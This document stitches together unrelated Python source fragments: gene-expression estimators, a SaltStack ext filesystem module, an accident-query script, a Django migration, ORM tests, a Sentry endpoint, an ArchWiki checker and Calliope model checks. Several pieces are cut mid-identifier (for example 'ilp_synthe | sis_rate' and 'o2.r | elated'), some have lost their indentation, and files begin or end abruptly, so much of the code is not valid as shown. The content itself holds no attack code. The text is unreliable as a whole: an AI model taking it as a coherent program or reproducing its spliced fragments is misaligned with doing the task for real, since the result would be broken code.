"""
This module implements fast estimators for the time-profiles of
growth rate, promoter activity, and protein concentrations.
These estimators rely on a simple model in which gene expression
is modeled as a one-step process. This enables to compute the
observation matrix directly using an ad-hoc formula.
As a consequence these algorithms are faster and require less
parameters than their counterparts in module ``estimators``
Simple approximations are made to compute the observation matrix;
these are valid as long as the vectors of estimation times (ttu) of
the different estimated inputs (growth rate, promoter activity,
protein concentration) have a fine time resolution.
See also:
----------
estimators : collection of functions for the inference
"""
import numpy as np
from scipy.integrate import odeint

from ..curves import Curve
from .methods import DEFAULT_ALPHAS, infer_control
def ilp_growth_rate(curve_volume, ttu, alphas=None, eps_L=.0001):
    """
    Estimate the growth-rate profile mu(t) from a measured volume curve.

    Parameters
    -----------
    curve_volume
      Curve of measured volume, or a list of such curves (in which case
      the function maps itself over the list and zips the results).
    ttu
      Times at which the growth rate is estimated; assumed to be
      regularly spaced — TODO confirm (only ttu[1]-ttu[0] is used).
    alphas
      Ridge smoothing parameters to test (defaults to DEFAULT_ALPHAS).
    eps_L
      Negligible factor for the derivation matrix.

    Returns
    --------
    mu, v_smoothed, ic, alpha, ascores
      As described below.
    mu
      Vector of inferred mu.
    v_smoothed
      The predicted value of the observed volume at the same time
      points as the data. v_smoothed will appear smoothed compared to
      the measured volume.
    ic, alpha, ascores
      Initial condition, selected regularization parameter, and the
      cross-validation scores returned by infer_control.
    """
    # List input: estimate each curve independently, then transpose the
    # per-curve result tuples into tuples of lists.
    if isinstance(curve_volume, list):
        results = [ilp_growth_rate(v, ttu,
                                   alphas=alphas, eps_L=eps_L)
                   for v in curve_volume]
        return zip(*results)
    if alphas is None: alphas = DEFAULT_ALPHAS
    ttv = curve_volume.x
    # Estimation-grid step (forced to float for Python-2 division safety).
    dttu = 1.0*(ttu[1]-ttu[0])
    # Column of ones: observation term for the initial condition.
    H_ic = np.ones((len(ttv),1))
    # dT is a Ny x Nu matrix with
    # dT[i,j] = ttv[i] - ttu[j]
    dT = np.array([ttv]).T - ttu
    # Piecewise-linear integration kernel, weighted by the volume at the
    # midpoint of each estimation interval.
    H_u = ( np.maximum(0, np.minimum(dttu, dT))
            * curve_volume(ttu+ dttu/2))
    H = np.hstack([H_ic, H_u])
    growth_rate, v_smooth, ic, alpha, ascores = \
        infer_control(H, y= curve_volume.y, Nic= 1,
                      alphas= alphas, eps_L = eps_L)
    return ( Curve(ttu, growth_rate),
             Curve(ttv, v_smooth),
             ic, alpha, ascores )
def ilp_synthe | sis_rate(curve_fluo, curve_volume, ttu, degr,
alphas=None, eps_L=.0001):
"""
dF/dt = s(t)V(t) - degr*F
Parameters
-----------
curve_fluo
A curve instance representing the (noisy) measured
fluorescence
| curve_volume
A curve instance representing the (noisy) measured
volume
ttu
Times at which the control is
Returns
--------
synth_rate, fluo_smoothed, ic, alpha, ascores
As described below.
synth_rate
Vector. Inferred control.
fluo_smoothed
The predicted value of the observed data at the same time
points as the data. y_smoothed will appear smoothed compared
to y.
mod
instance of sklearn.linear_model.RidgeCV, used for the Ridge
regularization / cross-validation. Useful to get the value
of the parameter alpha used etc.
"""
if isinstance(curve_fluo, list):
results = [ilp_synthesis_rate(f, v, ttu, degr,
alphas=alphas, eps_L=eps_L)
for f, v in zip(curve_fluo, curve_volume)]
return zip(*results)
if alphas is None: alphas = DEFAULT_ALPHAS
tt_fluo= curve_fluo.x
H_ic = np.exp(-degr*tt_fluo).reshape((len(tt_fluo),1))
model = lambda Y,t: 1 - degr*Y
dtau = ttu[1]-ttu[0]
m = odeint(model,0,[0,dtau]).flatten()[1]
TT = (ttu-np.array([tt_fluo]).T)
H_u = (m*np.exp(degr*TT)*(TT<0)) * curve_volume(ttu + dtau/2)
H = np.hstack([H_ic, H_u])
activity, fluo_smooth, ic, alpha, ascores = \
infer_control(H, y= curve_fluo.y, Nic= 1, alphas= alphas,
eps_L = eps_L)
return ( Curve(ttu, activity),
Curve(tt_fluo, fluo_smooth),
ic, alpha, ascores )
def ilp_concentration(curve_fluo, curve_volume, ttu, dR, dP,
                      alphas=None, eps_L=0.0001):
    """ Retrieves the concentration of a protein P, given
    the fluorescence of reporter R.

    Parameters
    -----------
    curve_fluo
      A curve instance representing the measured fluorescence
      (proportional to the quantities of reporter)
    curve_volume
      Volume of the population.
    ttu
      Times at which the concentration is estimated; assumed regularly
      spaced — TODO confirm (only ttu[1]-ttu[0] is used).
    dR
      Degradation rate of the reporter
    dP
      Degradation rate of the proteins.
    alphas
      Smoothing parameters to be tested.
    eps_L
      Negligible factor for the derivation matrix.

    Returns
    --------
    (concentration_curve, fluo_smoothed_curve, ic, alpha, ascores)

    NOTE(review): unlike the sibling estimators, alphas=None is passed
    straight to infer_control with no DEFAULT_ALPHAS fallback — confirm
    whether that is intentional.
    """
    if isinstance(curve_fluo, list):
        results = [ilp_concentration(f, v, ttu, dR, dP,
                                     alphas=alphas, eps_L=eps_L)
                   for f, v in zip(curve_fluo, curve_volume)]
        return zip(*results)
    tt = curve_fluo.x
    deltatau = ttu[1]-ttu[0]
    # dT[i,j] = tt[i] - ttu[j]
    dT = np.array([tt]).T-ttu
    dTlz = dT >= 0 # ti-tj > 0
    dTlzsdtau = dTlz*(dT < deltatau) # 0 < ti-tj < delta_tau
    # Observation kernel combining reporter decay (dR) and the
    # reporter/protein degradation mismatch (dP-dR).
    A = np.exp(dR*np.minimum(deltatau, dT)) - 1
    B = dTlz*np.exp(dT*(-dR))*(dP-dR)/dR
    Hu = (dTlzsdtau + A*B)*curve_volume(ttu+deltatau/2)
    # Decay of the initial condition at each observation time.
    Hic = np.array([np.exp(-dR*tt)]).reshape((len(tt),1))
    H = np.hstack([Hic, Hu])
    p_est, f_est, ic, a, ascores = infer_control(
        H, curve_fluo.y, 1, alphas=alphas, eps_L=eps_L)
    return (Curve(ttu, p_est),
            Curve(tt, f_est),
            ic, a, ascores )
orm.is_windows():
return (
False,
"The extfs execution module cannot be loaded: only available on "
"non-Windows systems.",
)
return True
def mkfs(device, fs_type, **kwargs):
    """
    Create a file system on the specified device

    CLI Example:

    .. code-block:: bash

        salt '*' extfs.mkfs /dev/sda1 fs_type=ext4 opts='acl,noexec'

    Valid options are:

    * **block_size**: 1024, 2048 or 4096
    * **check**: check for bad blocks
    * **direct**: use direct IO
    * **ext_opts**: extended file system options (comma-separated)
    * **fragment_size**: size of fragments
    * **force**: setting force to True will cause mke2fs to specify the -F
      option twice (it is already set once); this is truly dangerous
    * **blocks_per_group**: number of blocks in a block group
    * **number_of_groups**: ext4 option for a virtual block group
    * **bytes_per_inode**: set the bytes/inode ratio
    * **inode_size**: size of the inode
    * **journal**: set to True to create a journal (default on ext3/4)
    * **journal_opts**: options for the fs journal (comma separated)
    * **blocks_file**: read bad blocks from file
    * **label**: label to apply to the file system
    * **reserved**: percentage of blocks reserved for super-user
    * **last_dir**: last mounted directory
    * **test**: set to True to not actually create the file system (mke2fs -n)
    * **number_of_inodes**: override default number of inodes
    * **creator_os**: override "creator operating system" field
    * **opts**: mount options (comma separated)
    * **revision**: set the filesystem revision (default 1)
    * **super**: write superblock and group descriptors only
    * **fs_type**: set the filesystem type (REQUIRED)
    * **usage_type**: how the filesystem is going to be used
    * **uuid**: set the UUID for the file system

    See the ``mke2fs(8)`` manpage for a more complete description of these
    options.
    """
    # Friendly kwarg name -> mke2fs single-letter flag.
    kwarg_map = {
        "block_size": "b",
        "check": "c",
        "direct": "D",
        "ext_opts": "E",
        "fragment_size": "f",
        "force": "F",
        "blocks_per_group": "g",
        "number_of_groups": "G",
        "bytes_per_inode": "i",
        "inode_size": "I",
        "journal": "j",
        "journal_opts": "J",
        "blocks_file": "l",
        "label": "L",
        "reserved": "m",
        "last_dir": "M",
        "test": "n",
        "number_of_inodes": "N",
        "creator_os": "o",
        "opts": "O",
        "revision": "r",
        "super": "S",
        "usage_type": "T",
        "uuid": "U",
    }
    opts = ""
    for key, value in kwargs.items():
        flag = kwarg_map.get(key)
        if flag is None:
            continue
        # The literal string "True" marks a bare (valueless) flag.
        if value == "True":
            opts += "-{} ".format(flag)
        else:
            opts += "-{} {} ".format(flag, value)
    cmd = "mke2fs -F -t {} {}{}".format(fs_type, opts, device)
    out = __salt__["cmd.run"](cmd, python_shell=False).splitlines()
    # Strip progress/noise lines from mke2fs output, keep the summary.
    noise_prefixes = (
        "mke2fs",
        "Discarding device blocks",
        "Allocating group tables",
        "Writing inode tables",
        "Creating journal",
        "Writing superblocks",
    )
    ret = []
    for line in out:
        if line and not line.startswith(noise_prefixes):
            ret.append(line)
    return ret
def tune(device, **kwargs):
    """
    Set attributes for the specified device (using tune2fs)

    CLI Example:

    .. code-block:: bash

        salt '*' extfs.tune /dev/sda1 force=True label=wildstallyns opts='acl,noexec'

    Valid options are:

    * **max**: max mount count
    * **count**: mount count
    * **error**: error behavior
    * **extended_opts**: extended options (comma separated)
    * **force**: force, even if there are errors (set to True)
    * **group**: group name or gid that can use the reserved blocks
    * **interval**: interval between checks
    * **journal**: set to True to create a journal (default on ext3/4)
    * **journal_opts**: options for the fs journal (comma separated)
    * **label**: label to apply to the file system
    * **reserved**: percentage of blocks reserved for super-user
    * **last_dir**: last mounted directory
    * **opts**: mount options (comma separated)
    * **feature**: set or clear a feature (comma separated)
    * **mmp_check**: mmp check interval
    * **reserved**: reserved blocks count
    * **quota_opts**: quota options (comma separated)
    * **time**: time last checked
    * **user**: user or uid who can use the reserved blocks
    * **uuid**: set the UUID for the file system

    See the ``mke2fs(8)`` manpage for a more complete description of these
    options.
    """
    # Friendly kwarg name -> tune2fs single-letter flag.
    kwarg_map = {
        "max": "c",
        "count": "C",
        "error": "e",
        "extended_opts": "E",
        "force": "f",
        "group": "g",
        "interval": "i",
        "journal": "j",
        "journal_opts": "J",
        "label": "L",
        "last_dir": "M",
        "opts": "o",
        "feature": "O",
        "mmp_check": "p",
        "reserved": "r",
        "quota_opts": "Q",
        "time": "T",
        "user": "u",
        "uuid": "U",
    }
    opts = ""
    for key, value in kwargs.items():
        flag = kwarg_map.get(key)
        if flag is None:
            continue
        # The literal string "True" marks a bare (valueless) flag.
        if value == "True":
            opts += "-{} ".format(flag)
        else:
            opts += "-{} {} ".format(flag, value)
    cmd = "tune2fs {}{}".format(opts, device)
    out = __salt__["cmd.run"](cmd, python_shell=False).splitlines()
    return out
def attributes(device, args=None):
    """
    Return attributes from dumpe2fs for a specified device

    CLI Example:

    .. code-block:: bash

        salt '*' extfs.attributes /dev/sda1
    """
    return dump(device, args)["attributes"]
def blocks(device, args=None):
    """
    Return block and inode info from dumpe2fs for a specified device

    CLI Example:

    .. code-block:: bash

        salt '*' extfs.blocks /dev/sda1
    """
    return dump(device, args)["blocks"]
def dump(device, args=None):
    """
    Return all contents of dumpe2fs for a specified device

    CLI Example:

    .. code-block:: bash

        salt '*' extfs.dump /dev/sda1
    """
    cmd = "dumpe2fs {}".format(device)
    if args:
        cmd = cmd + " -" + args
    ret = {"attributes": {}, "blocks": {}}
    out = __salt__["cmd.run"](cmd, python_shell=False).splitlines()
    # Two-phase parse: filesystem attributes first ("opts"), then the
    # per-block-group section ("blocks").
    mode = "opts"
    group = None
    for line in out:
        if not line:
            continue
        if line.startswith("dumpe2fs"):
            # Version banner — skip.
            continue
        if mode == "opts":
            line = line.replace("\t", " ")
            comps = line.split(": ")
            if line.startswith("Filesystem features"):
                # Features are a space-separated list, not a scalar.
                ret["attributes"][comps[0]] = comps[1].split()
            elif line.startswith("Group") and not line.startswith(
                "Group descriptor size"
            ):
                # First "Group N:" header switches us to the blocks section.
                mode = "blocks"
            else:
                if len(comps) < 2:
                    continue
                ret["attributes"][comps[0]] = comps[1].strip()
        if mode == "blocks":
            if line.startswith("Group"):
                # Strip punctuation so the header splits into clean tokens:
                # "Group 0: (Blocks 0-32767) [ITABLE_ZEROED]" etc.
                line = line.replace(":", "")
                line = line.replace("(", "")
                line = line.replace(")", "")
                line = line.replace("[", "")
                line = line.replace("]", "")
                comps = line.split()
                blkgrp = comps[1]
                group = "Group {}".format(blkgrp)
                ret["blocks"][group] = {}
                ret["blocks"][group]["group"] = blkgrp
                ret["blocks"][group]["range"] = comps[3]
                # TODO: comps[4:], which may look one one of the following:
                #     ITABLE_ZEROED
                #     INODE_UNINIT, ITABLE_ZEROED
                # Does anyone know what
#!/usr/bin/python
# -*- coding: utf-8 -*-
from scripts.db_api import accident
def usa_query(hour):
    """Return SQL counting all USA accidents in *hour*, plus those where a
    vehicle exceeded the posted speed limit in that hour."""
    template = '''
    SELECT count(*), (select count(*) from accident
    join vehicle on(acc_id = accident.id)
    where country = 'USA'
    and vehicle.speed > accident.speed_limit
    and vehicle.speed > -1
    and accident.speed_limit > 0
    and date_part('hour', timestamp) = {0}) as exceeded
    from accident
    where country = 'USA' and date_part('hour', timestamp) = {0};
    '''
    return template.format(hour)
def get_value(age, dictionary):
    """Return ``dictionary[age]``, defaulting to 0 for missing keys."""
    # dict.get is the idiomatic one-call form of the lookup-with-default.
    return dictionary.get(age, 0)
if __name__ == '__main__':
    print('HOUR\tALL\tEXCEEDED')
    # range works on both Python 2 and 3 (xrange is Python-2-only); with
    # only 24 iterations the memory difference is irrelevant.
    for hour in range(0, 24):
        usa_count = accident.execute_query(usa_query(hour))
        print('{0}\t{1}\t{2}'.format(hour, usa_count[0][0], usa_count[0][1]))
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial schema for the message app: Broadcast, Log and Queue models."""
    # member.0001_initial must run first so member.Person exists for the
    # Log.persons many-to-many field below.
    dependencies = [
        ('member', '0001_initial'),
    ]
    operations = [
        migrations.CreateModel(
            name='Broadcast',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('name', models.CharField(max_length=20)),
                ('phone', models.CharField(max_length=15)),
            ],
        ),
        migrations.CreateModel(
            name='Log',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('date', models.DateTimeField()),
                ('message', models.CharField(max_length=200)),
                ('persons', models.ManyToManyField(to='member.Person')),
            ],
        ),
        migrations.CreateModel(
            name='Queue',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('date', models.DateTimeField()),
                ('sender', models.CharField(max_length=20)),
                ('message', models.CharField(max_length=200)),
                # NOTE(review): status choices skip the value 2 — presumably a
                # removed state; confirm before renumbering.
                ('status', models.IntegerField(default=0, choices=[(0, b'Moderated'), (1, b'Pending'), (3, b'Spam')])),
                ('resolution', models.IntegerField(null=True, choices=[(0, b'Approved'), (1, b'Decline')])),
            ],
        ),
        # Log.queue is added after both models are created (optional FK).
        migrations.AddField(
            model_name='log',
            name='queue',
            field=models.ForeignKey(blank=True, to='message.Queue', null=True),
        ),
    ]
| |
related = orm.db_related_field(
base.BaseGraphDB.RELATION_TYPES.input_to_input,
'TestDBObject'
)
o1 = TestDBObject(id='1')
o1.save()
o2 = TestDBObject(id='2')
o2.save()
| o3 = TestDBObject(id='2')
o3.save()
o1.related.add(o2)
o2.r | elated.add(o3)
self.assertEqual(o1.related.as_set(), {o2})
self.assertEqual(o2.related.as_set(), {o3})
class TestResourceORM(BaseResourceTest):
    """Basic persistence checks for orm.DBResource."""

    def test_save(self):
        db_res = orm.DBResource(id='test1', name='test1', base_path='x')
        db_res.save()
        loaded = resource.load(db_res.id)
        self.assertEqual(db_res, loaded.db_obj)

    def test_add_input(self):
        db_res = orm.DBResource(id='test1', name='test1', base_path='x')
        db_res.save()
        db_res.add_input('ip', 'str!', '10.0.0.2')
        self.assertEqual(len(db_res.inputs.as_set()), 1)

    def test_delete_resource(self):
        # NOTE(review): no delete call or assertion follows — this only
        # repeats the setup; confirm whether the deletion step was lost.
        db_res = orm.DBResource(id='test1', name='test1', base_path='x')
        db_res.save()
        db_res.add_input('ip', 'str!', '10.0.0.2')
class TestResourceInputORM(BaseResourceTest):
    """Checks backtrack_value_emitter() across scalar, list, dict and
    dict-in-list input schemas as connections are made and broken."""
    def test_backtrack_simple(self):
        sample_meta_dir = self.make_resource_meta("""
id: sample
handler: ansible
version: 1.0.0
input:
  value:
    schema: str!
    value:
        """)
        sample1 = self.create_resource(
            'sample1', sample_meta_dir, {'value': 'x'}
        )
        sample2 = self.create_resource(
            'sample2', sample_meta_dir, {'value': 'y'}
        )
        sample3 = self.create_resource(
            'sample3', sample_meta_dir, {'value': 'z'}
        )
        vi = sample2.resource_inputs()['value']
        # Unconnected input emits itself.
        self.assertEqual(vi.backtrack_value_emitter(), vi)
        # sample1 -> sample2
        signals.connect(sample1, sample2)
        self.assertEqual(vi.backtrack_value_emitter(),
                         sample1.resource_inputs()['value'])
        # sample3 -> sample1 -> sample2
        signals.connect(sample3, sample1)
        self.assertEqual(vi.backtrack_value_emitter(),
                         sample3.resource_inputs()['value'])
        # sample2 disconnected
        signals.disconnect(sample1, sample2)
        self.assertEqual(vi.backtrack_value_emitter(), vi)
    def test_backtrack_list(self):
        sample_meta_dir = self.make_resource_meta("""
id: sample
handler: ansible
version: 1.0.0
input:
  value:
    schema: str!
    value:
        """)
        sample_list_meta_dir = self.make_resource_meta("""
id: sample_list
handler: ansible
version: 1.0.0
input:
  values:
    schema: [str!]
    value:
        """)
        sample_list = self.create_resource(
            'sample_list', sample_list_meta_dir
        )
        vi = sample_list.resource_inputs()['values']
        sample1 = self.create_resource(
            'sample1', sample_meta_dir, {'value': 'x'}
        )
        sample2 = self.create_resource(
            'sample2', sample_meta_dir, {'value': 'y'}
        )
        sample3 = self.create_resource(
            'sample3', sample_meta_dir, {'value': 'z'}
        )
        self.assertEqual(vi.backtrack_value_emitter(), vi)
        # [sample1] -> sample_list
        signals.connect(sample1, sample_list, {'value': 'values'})
        self.assertEqual(vi.backtrack_value_emitter(),
                         [sample1.resource_inputs()['value']])
        # [sample3, sample1] -> sample_list
        signals.connect(sample3, sample_list, {'value': 'values'})
        self.assertSetEqual(set(vi.backtrack_value_emitter()),
                            set([sample1.resource_inputs()['value'],
                                 sample3.resource_inputs()['value']]))
        # sample2 disconnected
        signals.disconnect(sample1, sample_list)
        self.assertEqual(vi.backtrack_value_emitter(),
                         [sample3.resource_inputs()['value']])
    def test_backtrack_dict(self):
        sample_meta_dir = self.make_resource_meta("""
id: sample
handler: ansible
version: 1.0.0
input:
  value:
    schema: str!
    value:
        """)
        sample_dict_meta_dir = self.make_resource_meta("""
id: sample_dict
handler: ansible
version: 1.0.0
input:
  value:
    schema: {a: str!}
    value:
        """)
        sample_dict = self.create_resource(
            'sample_dict', sample_dict_meta_dir
        )
        vi = sample_dict.resource_inputs()['value']
        sample1 = self.create_resource(
            'sample1', sample_meta_dir, {'value': 'x'}
        )
        sample2 = self.create_resource(
            'sample2', sample_meta_dir, {'value': 'z'}
        )
        self.assertEqual(vi.backtrack_value_emitter(), vi)
        # {a: sample1} -> sample_dict
        signals.connect(sample1, sample_dict, {'value': 'value:a'})
        self.assertDictEqual(vi.backtrack_value_emitter(),
                             {'a': sample1.resource_inputs()['value']})
        # {a: sample2} -> sample_dict
        # Reconnecting the same dict key replaces the previous emitter.
        signals.connect(sample2, sample_dict, {'value': 'value:a'})
        self.assertDictEqual(vi.backtrack_value_emitter(),
                             {'a': sample2.resource_inputs()['value']})
        # sample2 disconnected
        signals.disconnect(sample2, sample_dict)
        self.assertEqual(vi.backtrack_value_emitter(), vi)
    def test_backtrack_dict_list(self):
        sample_meta_dir = self.make_resource_meta("""
id: sample
handler: ansible
version: 1.0.0
input:
  value:
    schema: str!
    value:
        """)
        sample_dict_list_meta_dir = self.make_resource_meta("""
id: sample_dict_list
handler: ansible
version: 1.0.0
input:
  value:
    schema: [{a: str!}]
    value:
        """)
        # NOTE(review): the resource is named 'sample_dict' although it uses
        # the dict-list meta — presumably a copy-paste slip; confirm.
        sample_dict_list = self.create_resource(
            'sample_dict', sample_dict_list_meta_dir
        )
        vi = sample_dict_list.resource_inputs()['value']
        sample1 = self.create_resource(
            'sample1', sample_meta_dir, {'value': 'x'}
        )
        sample2 = self.create_resource(
            'sample2', sample_meta_dir, {'value': 'y'}
        )
        sample3 = self.create_resource(
            'sample3', sample_meta_dir, {'value': 'z'}
        )
        self.assertEqual(vi.backtrack_value_emitter(), vi)
        # [{a: sample1}] -> sample_dict_list
        signals.connect(sample1, sample_dict_list, {'value': 'value:a'})
        self.assertListEqual(vi.backtrack_value_emitter(),
                             [{'a': sample1.resource_inputs()['value']}])
        # [{a: sample1}, {a: sample3}] -> sample_dict_list
        signals.connect(sample3, sample_dict_list, {'value': 'value:a'})
        self.assertItemsEqual(vi.backtrack_value_emitter(),
                              [{'a': sample1.resource_inputs()['value']},
                               {'a': sample3.resource_inputs()['value']}])
        # [{a: sample1}, {a: sample2}] -> sample_dict_list
        # The '|sample3' tag targets/replaces sample3's slot in the list.
        signals.connect(sample2, sample_dict_list, {'value': 'value:a|sample3'})
        self.assertItemsEqual(vi.backtrack_value_emitter(),
                              [{'a': sample1.resource_inputs()['value']},
                               {'a': sample2.resource_inputs()['value']}])
        # sample2 disconnected
        signals.disconnect(sample2, sample_dict_list)
        self.assertEqual(vi.backtrack_value_emitter(),
                         [{'a': sample1.resource_inputs()['value']}])
class TestEventORM(BaseResourceTest):
def test_return_emtpy_set(self):
r = orm.DBResource(id='test1', name='test1', base_path='x')
r.save()
self.assertEqual(r.events.as_set(), set())
def test_save_and_load_by_parent(self):
ev = orm.DBEvent(
parent='n1',
parent_action='run',
state='success',
child_action='run',
child='n2',
etype='dependency')
ev.save()
rst = orm.DBEvent.load(ev.id)
self.assertEqual(rst, ev)
def test_save_several(self):
ev = orm.DBEvent(
parent='n1',
parent_action='run',
state='success',
child_action='run',
child='n2',
etype='dependency')
ev.save()
ev1 = orm.DB |
from __future__ import absolute_import
from sentry.api.base import DocSection
from sentry.api.bases.project import ProjectEndpoint
from sentry.api.exceptions import ResourceDoesNotExist
from sentry.api.serializers import serialize
from sentry.models import TagKey, TagKeyStatus, TagValue
class ProjectTagKeyValuesEndpoint(ProjectEndpoint):
    doc_section = DocSection.PROJECTS

    def get(self, request, project, key):
        """
        List a tag's values

        Return a list of values associated with this key.

            {method} {path}

        """
        # Well-known tags are stored internally with a "sentry:" prefix.
        lookup_key = ('sentry:{0}'.format(key)
                      if key in ('release', 'user', 'filename', 'function')
                      else key)
        try:
            tagkey = TagKey.objects.get(
                project=project,
                key=lookup_key,
                status=TagKeyStatus.VISIBLE,
            )
        except TagKey.DoesNotExist:
            raise ResourceDoesNotExist
        values = TagValue.objects.filter(
            project=project,
            key=tagkey.key,
        )
        return self.paginate(
            request=request,
            queryset=values,
            order_by='-id',
            on_results=lambda x: serialize(x, request.user),
        )
|
#! /usr/bin/env python3
import contextlib
import threading
import mwparserfromhell
import ws.ArchWiki.lang as lang
from ws.utils import LazyProperty
from ws.parser_helpers.title import canonicalize
from ws.parser_helpers.wikicode import get_parent_wikicode, get_adjacent_node
__all__ = ["get_edit_summary_tracker", "localize_flag", "CheckerBase"]
# WARNING: using the context manager is not thread-safe
def get_edit_summary_tracker(wikicode, summary_parts):
    """Return a context-manager factory that records edit summaries.

    The returned ``checker(summary)`` context manager snapshots
    ``str(wikicode)`` on entry; if the text differs on exit (even when an
    exception escaped), ``summary`` is appended to ``summary_parts``.
    """
    @contextlib.contextmanager
    def checker(summary):
        before = str(wikicode)
        try:
            yield
        finally:
            if str(wikicode) != before:
                summary_parts.append(summary)
    return checker
def localize_flag(wikicode, node, template_name):
    """
    Rename the template adjacent to ``node`` to ``template_name`` when both
    share the same base (language-stripped) name.

    :param wikicode: a :py:class:`mwparserfromhell.wikicode.Wikicode` object
    :param node: a :py:class:`mwparserfromhell.nodes.Node` object
    :param str template_name: the name of the template flag, potentially
                              including a language name
    """
    parent = get_parent_wikicode(wikicode, node)
    neighbour = get_adjacent_node(parent, node, ignore_whitespace=True)
    if not isinstance(neighbour, mwparserfromhell.nodes.Template):
        return
    neighbour_base = lang.detect_language(str(neighbour.name))[0]
    target_base = lang.detect_language(template_name)[0]
    if canonicalize(neighbour_base) == canonicalize(target_base):
        neighbour.name = template_name
class CheckerBase:
    """Common infrastructure for wiki page checkers: API/DB handles, the
    wikicode lock, and template-name localization helpers."""
    def __init__(self, api, db, *, interactive=False, **kwargs):
        # api: MediaWiki API connection; db: local database handle —
        # exact types depend on the caller; TODO confirm.
        self.api = api
        self.db = db
        self.interactive = interactive
        # lock used for synchronizing access to the wikicode AST
        # FIXME: the lock should not be an attribute of the checker, but of the wikicode
        # maybe we can create a wrapper class (e.g. ThreadSafeWikicode) which would transparently synchronize all method calls: https://stackoverflow.com/a/17494777
        # (we would still have to manually lock for wrapper functions and longer parts in the checkers)
        self.lock_wikicode = threading.RLock()
    @LazyProperty
    def _alltemplates(self):
        # Cached set of all template page titles (namespace 10), with the
        # "Template:" prefix stripped.
        result = self.api.generator(generator="allpages", gapnamespace=10, gaplimit="max", gapfilterredir="nonredirects")
        return {page["title"].split(":", maxsplit=1)[1] for page in result}
    def get_localized_template(self, template, language="English"):
        # Return the localized variant of `template` if such a template page
        # exists, otherwise fall back to the English (base) name.
        # NOTE: assert is stripped under `python -O`; `template` must be an
        # existing template name.
        assert(canonicalize(template) in self._alltemplates)
        localized = lang.format_title(template, language)
        if canonicalize(localized) in self._alltemplates:
            return localized
        # fall back to English
        return template
    def handle_node(self, src_title, wikicode, node, summary_parts):
        # Subclasses implement the actual per-node check/transformation.
        raise NotImplementedError("the handle_node method was not implemented in the derived class")
|
"""
Copyright (C) 2013-2018 Calliope contributors listed in AUTHORS.
Licensed under the Apache 2.0 License (see LICENSE file).
run_checks.py
~~~~~~~~~~~~~
Checks for model consistency and possible errors when preparing run in the backend.
"""
import ruamel.yaml
import numpy as np
import pandas as pd
import xarray as xr
from calliope.core.attrdict import AttrDict
def check_operate_params(model_data):
    """
    if model mode = `operate`, check for clashes in capacity constraints.
    In this mode, all capacity constraints are set to parameters in the backend,
    so can easily lead to model infeasibility if not checked.

    Parameters
    ----------
    model_data : xarray.Dataset
        fully built model data; mutated in place (capacity overrides,
        run.cyclic_storage attribute, resource_cap variable).

    Returns
    -------
    comments : AttrDict
        debug output
    warnings : list
        possible problems that do not prevent the model run
        from continuing
    errors : list
        serious issues that should raise a ModelError
    """
    defaults = ruamel.yaml.load(model_data.attrs['defaults'], Loader=ruamel.yaml.Loader)
    warnings, errors = [], []
    comments = AttrDict()

    def _get_param(loc_tech, var):
        # Per-loc_tech value when present and not NaN, else the model default.
        if _is_in(loc_tech, var) and not pd.isnull(model_data[var].loc[loc_tech].item()):
            param = model_data[var].loc[loc_tech].item()
        else:
            param = defaults[var]
        return param

    def _is_in(loc_tech, set_or_var):
        # True when `loc_tech` can be indexed in the given set/variable.
        try:
            model_data[set_or_var].loc[loc_tech]
            return True
        except (KeyError, AttributeError):
            return False

    for loc_tech in model_data.loc_techs.values:
        energy_cap = model_data.energy_cap.loc[loc_tech].item()
        # Must have energy_cap defined for all relevant techs in the model
        if (pd.isnull(energy_cap) or np.isinf(energy_cap)) and not _is_in(loc_tech, 'force_resource'):
            errors.append(
                'Operate mode: User must define a finite energy_cap (via '
                'energy_cap_equals or energy_cap_max) for {}'.format(loc_tech)
            )
        elif _is_in(loc_tech, 'loc_techs_finite_resource'):
            # force resource overrides capacity constraints, so set capacity constraints to infinity
            if _is_in(loc_tech, 'force_resource'):
                if not _is_in(loc_tech, 'loc_techs_store'):
                    energy_cap = model_data.energy_cap.loc[loc_tech] = np.inf
                    warnings.append(
                        'Energy capacity constraint removed from {} as '
                        'force_resource is applied'.format(loc_tech)
                    )
                if _is_in(loc_tech, 'resource_cap'):
                    # Fix: removed a leftover debug print() that dumped
                    # resource_cap data to stdout on every matching loc_tech.
                    model_data.resource_cap.loc[loc_tech] = np.inf
                    warnings.append(
                        'Resource capacity constraint removed from {} as '
                        'force_resource is applied'.format(loc_tech)
                    )
            # Cannot have infinite resource area (physically impossible)
            if _is_in(loc_tech, 'loc_techs_area'):
                area = model_data.resource_area.loc[loc_tech].item()
                if pd.isnull(area) or np.isinf(area):
                    errors.append(
                        'Operate mode: User must define a finite resource_area '
                        '(via resource_area_equals or resource_area_max) for {}, '
                        'as a finite available resource is considered'.format(loc_tech)
                    )
            # Cannot have consumed resource being higher than energy_cap, as
            # constraints will clash. Doesn't affect supply_plus techs with a
            # storage buffer prior to carrier production.
            elif not _is_in(loc_tech, 'loc_techs_store'):
                resource_scale = _get_param(loc_tech, 'resource_scale')
                energy_cap_scale = _get_param(loc_tech, 'energy_cap_scale')
                resource_eff = _get_param(loc_tech, 'resource_eff')
                energy_eff = _get_param(loc_tech, 'energy_eff')
                resource = model_data.resource.loc[loc_tech].values
                if (energy_cap is not None and
                        any(resource * resource_scale * resource_eff >
                            energy_cap * energy_cap_scale * energy_eff)):
                    errors.append(
                        'Operate mode: resource is forced to be higher than '
                        'fixed energy cap for `{}`'.format(loc_tech)
                    )
        if _is_in(loc_tech, 'loc_techs_store'):
            if _is_in(loc_tech, 'charge_rate'):
                storage_cap = model_data.storage_cap.loc[loc_tech].item()
                if storage_cap and energy_cap:
                    charge_rate = model_data['charge_rate'].loc[loc_tech].item()
                    if storage_cap * charge_rate < energy_cap:
                        errors.append(
                            'fixed storage capacity * charge rate is not larger '
                            'than fixed energy capacity for loc::tech {}'.format(loc_tech)
                        )
    # Must define a resource capacity to ensure the Pyomo param is created
    # for it. But we just create an array of infs, so the capacity has no effect
    if ('resource_cap' not in model_data.data_vars.keys() and
            'loc_techs_supply_plus' in model_data.dims.keys()):
        model_data['resource_cap'] = xr.DataArray(
            [np.inf for i in model_data.loc_techs_supply_plus.values],
            dims='loc_techs_supply_plus')
        model_data['resource_cap'].attrs['is_result'] = 1
